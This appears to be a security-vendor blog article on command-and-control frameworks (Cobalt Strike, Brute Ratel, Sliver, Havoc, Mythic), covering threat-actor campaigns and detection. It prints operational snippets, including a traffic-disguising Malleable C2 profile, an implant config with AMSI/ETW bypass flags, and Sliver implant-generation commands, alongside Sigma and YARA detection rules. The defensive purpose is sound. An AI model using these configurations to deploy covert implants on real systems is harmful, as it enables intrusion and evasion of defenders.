C2 Frameworks: The Threat Actor's Arsenal

Command and Control frameworks have evolved from simple RATs to sophisticated platforms that blur the line between legitimate red team tools and nation-state weapons. This deep dive examines the most prevalent C2 frameworks, the threat actors wielding them, and the detection strategies that can expose their presence.

The Evolution of Command and Control

The landscape of Command and Control (C2) frameworks has undergone a dramatic transformation over the past decade. What began as simple remote access trojans (RATs) with basic capabilities has evolved into sophisticated, modular platforms that rival enterprise software in their complexity and feature sets.

Modern C2 frameworks provide threat actors with:

• Encrypted communications that blend with legitimate traffic
• Modular payload systems for on-demand capability deployment
• Evasion techniques to bypass EDR and antivirus solutions
• Malleable profiles that mimic legitimate applications
• Cross-platform agents targeting Windows, Linux, and macOS
• Peer-to-peer capabilities for resilient networks

Cobalt Strike: The Industry Standard

Cobalt Strike remains the most widely used C2 framework in both legitimate red team operations and malicious campaigns. Originally developed by Raphael Mudge and now owned by Fortra (formerly HelpSystems), it has become the de facto standard against which all other C2 frameworks are measured.

Technical Architecture

Cobalt Strike operates on a team server model where multiple operators can collaborate on engagements. The Beacon payload communicates with the team server using configurable protocols:

# Malleable C2 Profile Example - Mimicking jQuery
http-get {
    set uri "/jquery-3.3.1.min.js";

    client {
        header "Accept" "text/html,application/xhtml+xml";
        header "Accept-Language" "en-US,en;q=0.5";

        metadata {
            base64url;
            prepend "__cfduid=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/javascript";
        header "Cache-Control" "max-age=0, no-cache";

        output {
            mask;
            base64url;
            prepend "/*! jQuery v3.3.1 */";
            append "/*! END */";
            print;
        }
    }
}

Key Capabilities

• Beacon payload: Asynchronous or interactive sessions with configurable sleep times
• Malleable C2: Traffic profiles that mimic legitimate applications
• BOF (Beacon Object Files): In-memory execution of compiled C code
• SOCKS proxy: Pivoting through compromised hosts
• Mimikatz integration: Credential harvesting and Kerberos attacks
• Lateral movement: PsExec, WMI, WinRM, and SSH execution

Notable Campaigns

APT41 Healthcare Targeting (2024-2025)

APT41 conducted extensive campaigns against healthcare organizations worldwide, leveraging Cobalt Strike Beacons deployed through compromised Citrix and Pulse Secure VPN appliances. The group used custom Malleable C2 profiles mimicking Microsoft Azure traffic to evade detection. Post-compromise activity included deployment of custom ShadowPad variants for long-term persistence.

Operation Morpheus (June 2024)

In a landmark law enforcement action, Europol coordinated the disruption of 593 malicious Cobalt Strike servers across 27 countries. The operation, involving agencies from the UK, US, Australia, Canada, Germany, and others, targeted servers hosting cracked versions of Cobalt Strike used in ransomware and espionage campaigns.

MITRE ATT&CK ID	Technique	Cobalt Strike Implementation
T1055	Process Injection	Beacon spawns sacrificial processes for post-ex
T1071.001	Web Protocols	HTTP/HTTPS C2 with malleable profiles
T1059.001	PowerShell	PowerShell stagers and post-exploitation
T1003	OS Credential Dumping	Integrated Mimikatz, DCSync, Kerberoasting
T1021.002	SMB/Windows Admin Shares	PsExec, service creation lateral movement

Brute Ratel C4: The Detection Evasion Specialist

Brute Ratel C4 (BRc4) emerged in 2020 as a commercial adversary simulation tool explicitly designed to evade modern EDR solutions. Created by Chetan Nayak (Paranoid Ninja), a former red team operator at Mandiant and CrowdStrike, BRc4 incorporates lessons learned from years of offensive operations against enterprise security stacks.

Technical Differentiators

BRc4's architecture prioritizes stealth over features:

# Brute Ratel badger configuration
{
  "sleep": 60,
  "jitter": 50,
  "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
  "hosts": ["cdn.example.com:443", "api.example.com:443"],
  "rotation": "round-robin",
  "proxy_aware": true,
  "syscall_mode": "indirect",
  "etw_bypass": true,
  "amsi_bypass": true
}

Key Capabilities

• Badger payload: Lightweight agent with built-in EDR evasion
• Indirect syscalls: Bypasses userland API hooking by directly invoking NT functions
• ETW patching: Disables Event Tracing for Windows to blind security tools
• AMSI bypass: Neutralizes Antimalware Scan Interface
• SMB/TCP pivoting: Agent chaining through internal networks
• LDAP querying: Built-in Active Directory reconnaissance
• Custom DoH/DoT: DNS-over-HTTPS/TLS for covert channels

The Patchwork Campaign Against Bhutan (2024)

In one of the most significant documented uses of BRc4 by an APT, the Patchwork group targeted Bhutanese government entities with sophisticated spear-phishing campaigns. The attack chain demonstrated the evolution of nation-state tradecraft:

1. Initial Access: Spear-phishing emails with diplomatic-themed lures (.docx files)
2. Execution: Macro-enabled documents dropping BRc4 badger via DLL side-loading
3. Persistence: Scheduled tasks and registry run keys
4. C2: HTTPS communications to attacker-controlled infrastructure mimicking CDN providers
5. Collection: Document exfiltration and credential harvesting

LUNAR SPIDER and the Ransomware Economy

LUNAR SPIDER represents the intersection of initial access brokers and ransomware operations. Their use of BRc4 demonstrates the tool's appeal to financially motivated actors:

# Typical LUNAR SPIDER attack flow
1. Initial Access: IcedID/Latrodectus phishing campaign
2. Foothold: BRc4 badger deployment via Latrodectus loader
3. Discovery: LDAP queries, network enumeration
4. Lateral Movement: SMB/WMI with harvested credentials
5. Data Staging: Archive creation on file shares
6. Exfiltration: HTTPS to attacker infrastructure
7. Impact: Ransomware deployment (often BlackCat/ALPHV)

Sliver: The Open-Source Alternative

Sliver, developed by Bishop Fox, has emerged as the leading open-source alternative to commercial C2 frameworks. Its MIT license, active development, and extensive documentation have made it increasingly popular with both red teams and threat actors seeking to avoid the scrutiny associated with Cobalt Strike.

Architecture Overview

# Sliver implant generation
sliver > generate --mtls 192.168.1.100 --os windows --arch amd64 --format exe --save implant.exe

# HTTP C2 with custom headers
sliver > https --domain cdn.example.com --lport 443 \
         --cert /path/to/cert.pem --key /path/to/key.pem

# mTLS listener for encrypted communications
sliver > mtls --lhost 0.0.0.0 --lport 8888

Key Capabilities

• Multi-protocol C2: mTLS, HTTP(S), DNS, WireGuard, and named pipes
• Cross-platform: Windows, Linux, macOS implant generation
• Dynamic code execution: In-memory .NET assembly and BOF execution
• Armory: Extension marketplace with community-contributed modules
• Multiplayer: Multi-operator support with role-based access
• Stager payloads: Shellcode and staged implant delivery
• Traffic encryption: Asymmetric key exchange with per-session encryption

The Sliver Adoption Wave

Microsoft's 2024 threat intelligence report documented a 300% increase in Sliver usage among tracked threat actors compared to 2023. This surge is attributed to several factors:

• Improved Cobalt Strike detection: Years of defensive research have made Cobalt Strike increasingly difficult to use covertly
• Open-source availability: No licensing costs or cracked version risks
• Active development: Regular updates adding new evasion capabilities
• Documentation quality: Comprehensive guides lower the barrier to entry

Havoc: The Modern Framework

Havoc emerged in 2022 as a modern C2 framework with a focus on user experience and extensibility. Developed by C5pider, it combines the flexibility of open-source with advanced evasion capabilities typically found in commercial tools.

Technical Features

# Havoc Demon (implant) capabilities
- Sleep obfuscation with custom techniques
- Indirect syscalls via Hell's Gate/Halo's Gate
- AMSI/ETW/WLDP bypass options
- Custom reflective loader
- Extensible via Python/C BOFs

# Teamserver configuration
Teamserver:
  Host: 0.0.0.0
  Port: 40056

Operators:
  - Name: "operator1"
    Password: "Password123!"

Listeners:
  - Name: "https-listener"
    Protocol: Https
    Host: 192.168.1.100
    Port: 443
    Secure: true

Key Capabilities

• Demon payload: Feature-rich implant with extensive evasion
• Modern UI: Qt-based cross-platform interface
• Python API: Scriptable automation and integration
• Sleep techniques: Ekko, Zilean, and custom sleep obfuscation
• Token manipulation: Advanced impersonation capabilities
• Inline execution: Execute assemblies and BOFs in implant process

The Grayling Campaign

Symantec's 2024 discovery of the Grayling APT revealed a sophisticated operation using Havoc alongside traditional tools. The campaign targeted organizations in Taiwan, Vietnam, the Solomon Islands, and US-based biomedical companies:

Mythic: The Modular Platform

Mythic represents a different approach to C2 frameworks, functioning as a platform that supports multiple payload types through a modular agent architecture. Developed by Cody Thomas (its_a_feature_), Mythic's flexibility has attracted both sophisticated red teams and threat actors.

Architecture

# Mythic supports multiple agent types:
# - Athena (.NET cross-platform)
# - Apollo (Windows)
# - Poseidon (Golang cross-platform)
# - Medusa (Python)
# - Merlin (Golang)

# Agent installation
./mythic-cli install github https://github.com/MythicAgents/apollo

# C2 Profile installation
./mythic-cli install github https://github.com/MythicC2Profiles/http

Key Capabilities

• Multi-agent architecture: Support for diverse payload types
• Custom C2 profiles: Pluggable communication protocols
• Web UI: Modern React-based interface
• Reporting: Built-in operation documentation
• Artifact tracking: Automatic IOC collection
• MITRE mapping: Automatic ATT&CK technique tagging

Framework Comparison

Emerging Threats and Trends

The Shift Away from Cobalt Strike

The 2024-2025 period has marked a significant shift in threat actor tooling preferences. Several factors drive this transition:

• Operation Morpheus impact: The takedown of 593 servers demonstrated the risks of relying on well-known infrastructure
• Improved detection: Years of research have made default Cobalt Strike configurations detectable by most EDR solutions
• Licensing crackdowns: Fortra's legal actions against cracked versions have reduced availability
• Alternative maturity: Sliver, Havoc, and BRc4 have reached feature parity for most operations

Custom Framework Development

Advanced threat actors are increasingly developing custom C2 frameworks to avoid detection signatures entirely. Notable examples include:

• ShadowPad: Chinese APT-exclusive modular backdoor used alongside public tools
• Sunburst: The SolarWinds backdoor demonstrated nation-state capability for custom development
• Industroyer2: Purpose-built ICS targeting framework attributed to Sandworm

AI-Assisted Evasion

Emerging research suggests threat actors are exploring AI-assisted techniques for:

• Automated malleable profile generation to mimic legitimate traffic
• Dynamic payload modification to evade static signatures
• Behavioral analysis evasion through adaptive sleep patterns

Detection and Hunting Strategies

Network-Based Detection

# Sigma rule for suspicious JA3 fingerprints
title: Potential C2 Framework JA3 Fingerprint
status: experimental
logsource:
    category: proxy
detection:
    selection:
        ja3_hash:
            - '72a589da586844d7f0818ce684948eea'  # Cobalt Strike
            - '6734f37431670b3ab4292b8f60f29984'  # Sliver default
            - 'a0e9f5d64349fb13f94d1b9f78d9c4d8'  # BRc4 default
    condition: selection

Endpoint Detection

# YARA rule for common C2 memory patterns
rule C2_Memory_Pattern {
    meta:
        description = "Detects common C2 framework memory patterns"
        author = "Brickell Technologies"
    strings:
        $beacon_config = { 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? 00 00 }
        $sleep_mask = { 48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 74 24 ?? }
        $syscall_stub = { 4C 8B D1 B8 ?? ?? 00 00 0F 05 C3 }
    condition:
        2 of them
}

Behavioral Indicators

• Process injection patterns: CreateRemoteThread, QueueUserAPC, NtMapViewOfSection
• Unusual parent-child relationships: Word/Excel spawning cmd.exe/powershell.exe
• Named pipe creation: Monitor for non-standard pipe names
• Sleep patterns: Regular beacon intervals with consistent jitter
• Credential access: LSASS access, DCSync traffic, Kerberoasting

Defensive Recommendations

Conclusion

The C2 framework landscape continues to evolve as threat actors adapt to improved defenses. While Cobalt Strike remains prevalent, the increasing adoption of alternatives like Brute Ratel, Sliver, and Havoc by both APT groups and financially motivated actors presents new challenges for defenders.

Key takeaways for security teams:

• Diversify detection: Don't rely solely on Cobalt Strike signatures
• Focus on behaviors: Technique-based detection outlasts specific tool signatures
• Track threat intelligence: Understand which actors are using which tools
• Test your defenses: Regular red team exercises using current frameworks
• Assume breach: Build detection capabilities for post-exploitation activities

The tools described in this article serve legitimate purposes in authorized security testing. However, their abuse by threat actors necessitates continuous advancement of defensive capabilities. By understanding these frameworks deeply, defenders can better protect their organizations from sophisticated adversaries.